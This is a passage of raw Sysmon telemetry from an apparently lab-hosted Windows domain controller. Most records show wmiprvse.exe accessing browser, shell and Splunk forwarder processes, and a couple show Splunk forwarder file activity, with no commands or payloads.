12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-0C90-618C-C1AA-04000000F101}5016C:\Windows\system32\fontdrvhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348717Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-BC2E-618B-B6A0-04000000F101}8728C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348716Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348715Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348714Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-BB8B-618B-50A0-04000000F101}9212C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348713Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348712Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-EC4D-6172-7BB6-01000000F101}9996C:\Windows\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348711Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-EC34-6172-7AB6-01000000F101}9316C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348710Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-EC34-6172-79B6-01000000F101}8640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348709Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-EC2E-6172-77B6-01000000F101}9380C:\Windows\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348708Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-E8B4-6172-0DB6-01000000F101}1204C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348707Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-E4CD-6172-AAB2-01000000F101}9240C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348706Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-C662-6171-B490-01000000F101}6664C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348705Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-BFC4-6171-ED8F-01000000F101}4284C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 11241100x800000000000000057348704Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 10341000x800000000000000057348703Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-BF5B-6171-DE8F-01000000F101}6860C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x800000000000000057348702Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60B13B2FE4D818D5304FBEAF16E9D3A4,SHA256=1491A7E621069B71C849B094A427A4820E2820F01FDEC0BFC40542D7895AB832falsetrue 10341000x800000000000000057348701Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-BF19-6171-D68F-01000000F101}920C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348700Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-BB7B-6171-698F-01000000F101}6612C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348699Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-7550-6171-1787-01000000F101}912C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348698Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-4221-6170-F662-01000000F101}384C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348697Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-2562-6170-855F-01000000F101}4504C:\Program Files\Mozilla 